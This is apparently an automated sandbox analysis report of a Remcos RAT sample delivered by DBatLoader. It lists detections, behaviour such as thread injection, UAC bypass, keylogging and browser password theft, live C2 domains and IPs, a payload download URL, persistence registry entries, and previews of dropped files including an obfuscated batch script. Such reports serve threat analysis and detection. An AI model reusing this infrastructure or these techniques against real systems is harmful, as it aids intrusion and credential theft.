                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Valid Accounts                  		/etc/passwd and /etc/shadow3
                  Process Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron3
                  Virtualization/Sandbox Evasion                  		Network Sniffing1
                  Application Window Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
                  Access Token Manipulation                  		Input Capture1
                  System Owner/User Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task422
                  Process Injection                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562870 Sample: AWkpqJMxci.exe Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 58 ogcmaw.duckdns.org 2->58 60 emberluck.duckdns.org 2->60 62 2 other IPs or domains 2->62 78 Suricata IDS alerts for network traffic 2->78 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 86 12 other signatures 2->86 9 AWkpqJMxci.exe 1 6 2->9         started        14 Bzaszylr.PIF 2->14         started        16 Bzaszylr.PIF 2->16         started        signatures3 84 Uses dynamic DNS services 60->84 process4 dnsIp5 68 drive.usercontent.google.com 142.250.181.33, 443, 49730, 49731 GOOGLEUS United States 9->68 48 C:\Users\Public\Libraries\rlyzsazB.cmd, DOS 9->48 dropped 50 C:\Users\Public\Libraries\Bzaszylr, data 9->50 dropped 52 C:\Users\Public\Bzaszylr.url, MS 9->52 dropped 102 Writes to foreign memory regions 9->102 104 Allocates memory in foreign processes 9->104 106 Creates a thread in another existing process (thread injection) 9->106 114 2 other signatures 9->114 18 colorcpl.exe 5 9->18         started        22 cmd.exe 1 9->22         started        24 esentutl.exe 2 9->24         started        108 Antivirus detection for dropped file 14->108 110 Multi AV Scanner detection for dropped file 14->110 112 Machine Learning detection for dropped file 14->112 27 SndVol.exe 14->27         started        29 colorcpl.exe 16->29         started        file6 signatures7 process8 dnsIp9 64 emberluck.duckdns.org 192.169.69.26, 2500, 49733, 49741 WOWUS United States 18->64 66 ogcmaw.duckdns.org 162.216.243.15, 2404, 49732, 49740 DYNUUS United States 18->66 88 Contains functionality to bypass UAC (CMSTPLUA) 18->88 90 Detected Remcos RAT 18->90 92 Contains functionalty to change the wallpaper 18->92 94 Contains functionality to register a low level keyboard hook 18->94 31 esentutl.exe 2 22->31         started        35 alpha.pif 1 22->35         started        37 esentutl.exe 2 22->37         started        41 6 other processes 22->41 46 C:\Users\Public\Libraries\Bzaszylr.PIF, PE32 24->46 dropped 39 conhost.exe 24->39         started        96 Contains functionality to steal Chrome passwords or cookies 27->96 98 Contains functionality to steal Firefox passwords or cookies 27->98 100 Delayed program exit found 27->100 file10 signatures11 process12 file13 54 C:\Users\Public\alpha.pif, PE32 31->54 dropped 72 Drops PE files to the user root directory 31->72 74 Drops PE files with a suspicious file extension 31->74 76 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 31->76 43 xpha.pif 1 35->43         started        56 C:\Users\Public\xpha.pif, PE32 37->56 dropped signatures14 process15 dnsIp16 70 127.0.0.1 unknown unknown 43->70

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  AWkpqJMxci.exe71%ReversingLabsWin32.Backdoor.Remcos
                  AWkpqJMxci.exe100%AviraTR/AD.Nekark.gwqnm
                  AWkpqJMxci.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\Public\Libraries\Bzaszylr.PIF100%AviraTR/AD.Nekark.gwqnm
                  C:\Users\Public\Libraries\Bzaszylr.PIF100%Joe Sandbox ML
                  C:\Users\Public\Libraries\Bzaszylr.PIF71%ReversingLabsWin32.Backdoor.Remcos
                  C:\Users\Public\alpha.pif0%ReversingLabs
                  C:\Users\Public\xpha.pif0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  ogcmaw.duckdns.org0%Avira URL Cloudsafe
                  emberluck.duckdns.org0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  		199.232.210.172
                  		truefalse
                    		high
                    ogcmaw.duckdns.org
                    		162.216.243.15
                    		truetrue
                      		unknown
                      drive.usercontent.google.com
                      		142.250.181.33
                      		truefalse
                        		high
                        emberluck.duckdns.org
                        		192.169.69.26
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          ogcmaw.duckdns.orgtrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://drive.usercontent.google.com/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0false
                            		high
                            emberluck.duckdns.orgtrue
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://geoplugin.net/json.gpcolorcpl.exe, SndVol.exefalse
                                		high
                                https://sectigo.com/CPS0AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    http://ocsp.sectigo.com0AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      http://geoplugin.net/json.gp/Ccolorcpl.exe, 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmpfalse
                                        		high
                                        https://drive.usercontent.google.com/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0?AWkpqJMxci.exe, 00000000.00000002.1781709227.00000000007A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            https://drive.usercontent.google.com/AWkpqJMxci.exe, 00000000.00000002.1781709227.0000000000785000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.pmail.comAWkpqJMxci.exe, AWkpqJMxci.exe, 00000000.00000002.1805021411.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://ocsp.sectigo.com0CAWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.usercontent.google.com:443/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0xAWkpqJMxci.exe, 00000000.00000002.1781709227.00000000007AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      142.250.181.33
                                                      		drive.usercontent.google.comUnited States
                                                      		15169GOOGLEUSfalse
                                                      192.169.69.26
                                                      		emberluck.duckdns.orgUnited States
                                                      		23033WOWUStrue
                                                      162.216.243.15
                                                      		ogcmaw.duckdns.orgUnited States
                                                      		398019DYNUUStrue

                                                      Private

                                                      IP
                                                      127.0.0.1

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1562870
                                                      Start date and time:2024-11-26 08:23:09 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 11m 13s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:23
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:AWkpqJMxci.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:096394b733ca53e65afa06302776c52330f2567d665a42e0c5463fe23c523e62.exe
                                                      Detection:MAL
                                                      Classification:mal100.rans.troj.spyw.expl.evad.winEXE@34/10@9/4
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 96
                                                      • Number of non-executed functions: 182
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 20.3.187.198, 40.69.42.241
                                                      • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: AWkpqJMxci.exe

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      02:24:00API Interceptor2x Sleep call for process: AWkpqJMxci.exe modified
                                                      02:24:22API Interceptor2x Sleep call for process: Bzaszylr.PIF modified
                                                      02:24:47API Interceptor3770375x Sleep call for process: colorcpl.exe modified
                                                      07:24:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Bzaszylr C:\Users\Public\Bzaszylr.url
                                                      07:24:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Bzaszylr C:\Users\Public\Bzaszylr.url

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      192.169.69.26SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                      • yuya0415.duckdns.org:1928/Vre
                                                      confirmaci#U00f3n y correcci#U00f3n de la direcci#U00f3n de entrega.vbsGet hashmaliciousUnknownBrowse
                                                      • servidorarquivos.duckdns.org/e/e
                                                      oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                                      • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                                      oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                                      • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                                      http://yvtplhuqem.duckdns.org/ja/Get hashmaliciousUnknownBrowse
                                                      • yvtplhuqem.duckdns.org/ja/
                                                      http://fqqqffcydg.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                                      • fqqqffcydg.duckdns.org/en/
                                                      http://yugdzvsqnf.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                                      • yugdzvsqnf.duckdns.org/en/
                                                      &nuevo_pedido#..vbsGet hashmaliciousUnknownBrowse
                                                      • servidorarquivos.duckdns.org/e/e
                                                      transferencia_Hsbc.xlsxGet hashmaliciousUnknownBrowse
                                                      • servidorarquivos.duckdns.org/e/e
                                                      http://www.secure-0fflce-o365.duckdns.org/Get hashmaliciousUnknownBrowse
                                                      • www.secure-0fflce-o365.duckdns.org/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      emberluck.duckdns.orgnNGLl351Fq.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                      • 172.81.61.215
                                                      BAR9WigoSh.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 172.81.61.215
                                                      RFQ_New_Tube_Bundle_of_E-2419.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 146.70.79.79
                                                      7rl9yBsGXL.exeGet hashmaliciousNetWire, DBatLoaderBrowse
                                                      • 146.70.79.79
                                                      bg.microsoft.map.fastly.netfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                      • 199.232.214.172
                                                      Fumari INC.emlGet hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      fpAb6lVZ9A.dllGet hashmaliciousCobaltStrikeBrowse
                                                      • 199.232.214.172
                                                      Customer forms.pdfGet hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      IJ9n6ms5CT.exeGet hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      Evidence of copyright infringement.batGet hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      AccountDocuments - christinal.docxGet hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      Disputes.accdbGet hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      ZwmyzMxFKL.exeGet hashmaliciousBlackMoonBrowse
                                                      • 199.232.210.172
                                                      PVJ6cLZQ0T.xlsGet hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      ogcmaw.duckdns.orgRFQ_New_Tube_Bundle_of_E-2419.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 146.70.79.79

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      DYNUUSwinst.exeGet hashmaliciousUnknownBrowse
                                                      • 162.216.242.206
                                                      winst.exeGet hashmaliciousUnknownBrowse
                                                      • 162.216.242.206
                                                      https://ids.calfrom.org/Get hashmaliciousUnknownBrowse
                                                      • 142.202.190.16
                                                      http://c0vudiyvuu.theworkpc.com/#cl/82_md/2/11/263/6/44456Get hashmaliciousUnknownBrowse
                                                      • 162.216.242.206
                                                      EEwABOSd8h.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 142.202.189.94
                                                      Order151smapl.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 142.202.190.140
                                                      n6dS0UI5yA.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 142.202.191.238
                                                      payslip2833.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 142.202.189.215
                                                      payslip2833.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 142.202.189.215
                                                      Invfile2123.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 142.202.189.215
                                                      WOWUSD2pQ4J4GGZ.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 192.169.69.26
                                                      decode_6ec70947443cc64628fe11013d0e752591680ef46c9a78ec1409313d6669bdf9.exeGet hashmaliciousXWormBrowse
                                                      • 192.169.69.26
                                                      ibTSSrn71X.exeGet hashmaliciousAsyncRATBrowse
                                                      • 192.169.69.26
                                                      Dxnrbs22FC.exeGet hashmaliciousAsyncRATBrowse
                                                      • 192.169.69.26
                                                      QUOTATION #46789RFQ_SUPLMS_NOV24_SALEH_CONSTRUCTIONS_LLC_PDF.exeGet hashmaliciousRemcos, DarkTortillaBrowse
                                                      • 192.169.69.26
                                                      http://updatechrome.duckdns.org/1234567890.functionsGet hashmaliciousUnknownBrowse
                                                      • 192.169.69.25
                                                      file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                      • 192.169.69.26
                                                      SPA-0987-ORDER.exeGet hashmaliciousRemcosBrowse
                                                      • 192.169.69.26
                                                      seemebestthingswhichevermadebybestthingsgodown.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                      • 192.169.69.26
                                                      CI.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                      • 192.169.69.26

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      a0e9f5d64349fb13191bc781f81f42e1D2pQ4J4GGZ.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 142.250.181.33
                                                      C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                      • 142.250.181.33
                                                      2jbMIxCFsK.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                      • 142.250.181.33
                                                      9oKqST-uPDy7iigkXM-C5J2.emlGet hashmaliciousUnknownBrowse
                                                      • 142.250.181.33
                                                      1m181Ru74o.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 142.250.181.33
                                                      jlPBMMQbXC.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                      • 142.250.181.33
                                                      qqig1mHX8U.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                      • 142.250.181.33
                                                      nft438A5fN.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                      • 142.250.181.33
                                                      6BE4RDldhw.exeGet hashmaliciousDBatLoaderBrowse
                                                      • 142.250.181.33
                                                      AnyDesk.exeGet hashmaliciousDBatLoaderBrowse
                                                      • 142.250.181.33

                                                      Dropped Files

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\Users\Public\alpha.pifD2pQ4J4GGZ.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                        C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                          2jbMIxCFsK.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                            1m181Ru74o.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                              jlPBMMQbXC.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                qqig1mHX8U.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                  nft438A5fN.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                    RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                      IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                        USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse

                                                                          Created / dropped Files

                                                                          C:\Users\Public\Bzaszylr.url

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\AWkpqJMxci.exe
                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Bzaszylr.PIF">), ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):104
                                                                          Entropy (8bit):5.137503781179706
                                                                          Encrypted:false
                                                                          SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMLACIvsbxHXAIv:HRYFVmTWDyz0tSExwS
                                                                          MD5:D7A9298F5915479772B4D29CA8AB9AC5
                                                                          SHA1:7FD4E1CFFF79D25F8EF255F426CEFAEADE7C066C
                                                                          SHA-256:26924262FAAB2021A7E9D341D8D81EDA6690B9DA0947840298DF3C182F165287
                                                                          SHA-512:9111C7C1D9D1D1D6B039BA7068260FC20BB61DEEB707DE8C9CF75F95E740F72184E4C199B3B40989B94C77B0FFDAA27713370CFA4709019F243B488D2DA484FD
                                                                          Malicious:true
                                                                          Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Bzaszylr.PIF"..IconIndex=987617..HotKey=73..

                                                                          C:\Users\Public\Libraries\Bzaszylr

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\AWkpqJMxci.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):803600
                                                                          Entropy (8bit):7.399331705226032
                                                                          Encrypted:false
                                                                          SSDEEP:24576:MW9nQUcR5xKPmdygwpAeodt00e8JbC+UFlf:3JQ/cPGyTpAZjbC+U3f
                                                                          MD5:C6B36E051D3FBF1D162303586D8D3FC8
                                                                          SHA1:F23C7A777169D3467CBC1CCA6C9D9E8427ACCA1F
                                                                          SHA-256:92FFFFA82890005940FB1D797FEB8E7D68F5314C0391E8CF1F40C0ABAA6DA626
                                                                          SHA-512:86BA7E3E30244425C45FEF8021865639A48EF0A8933384A830656560421E14D1430B6A7E711E9984886D0BF11E2D89C124B3C0235F122E41E3405A4F88D34661
                                                                          Malicious:true
                                                                          Preview:...g1..Y0 .(00.2##.,#4.*1/&)01%'..#1) .-...g1..Y[5..54'- 4"...g1..Y........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R........................a..c.................................................................................................................................................................................................................................................................................................................................................................................................................................39. d%.egi...6

                                                                          C:\Users\Public\Libraries\Bzaszylr.PIF

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\esentutl.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1339392
                                                                          Entropy (8bit):7.186865824174257
                                                                          Encrypted:false
                                                                          SSDEEP:24576:lXcmzpu+0sDG7JD/7YnmDPd037ElJo7gZtnrQ5VlPgemhs2u+/T:lXZpxDfmS3wvo0ZtrQ5VZQhsD+/T
                                                                          MD5:B4E2055B4877DCFCBF9A366106B15591
                                                                          SHA1:459F7B89E83D5BE3581029DCA3BB32D4C97D8156
                                                                          SHA-256:096394B733CA53E65AFA06302776C52330F2567D665A42E0C5463FE23C523E62
                                                                          SHA-512:AFAFADA21255956613393E13F8D67B1A4D1DA780CAD6CEDC4BB5C01B3B17863E29E981548959B0790E2F40A2498FB6A04070289C551E2489E652B0E3E0525107
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................8'.......l..........................................................................X................................text............................... ..`.itext.............................. ..`.data...DU.......V..................@....bss.....6...p.......F...................idata..8'.......(...F..............@....tls....4............n...................rdata...............n..............@..@.reloc...............p..............@..B.rsrc....l.......l..................@..@.....................p..............@..@................................................................................................

                                                                          C:\Users\Public\Libraries\PNO

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\AWkpqJMxci.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):4
                                                                          Entropy (8bit):2.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:pvn:Bn
                                                                          MD5:778300BD8587672716B777C1C3F07C14
                                                                          SHA1:EF2781BBE133C16ADB6600F5D01C3683F584384E
                                                                          SHA-256:CC40D093B4B0AA5F9CE40061B3489183AAB268DA0BE0400DEE53E5A6480D9346
                                                                          SHA-512:265A83B0F14B57BA28203DDF96115EE404C34AC3DAF8CBA31E38B63DAEB31A84454B21B215AD603CA0EF424FAA11E1D003BC3F1510639A73A01929121513C2F0
                                                                          Malicious:false
                                                                          Preview:29..

                                                                          C:\Users\Public\Libraries\rlyzsazB.cmd

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\AWkpqJMxci.exe
                                                                          File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):62357
                                                                          Entropy (8bit):4.705712327109906
                                                                          Encrypted:false
                                                                          SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                          MD5:B87F096CBC25570329E2BB59FEE57580
                                                                          SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                          SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                          SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                          Malicious:true
                                                                          Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                                                          C:\Users\Public\alpha.pif

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\esentutl.exe
                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):236544
                                                                          Entropy (8bit):6.4416694948877025
                                                                          Encrypted:false
                                                                          SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                          MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                          SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                          SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: D2pQ4J4GGZ.exe, Detection: malicious, Browse
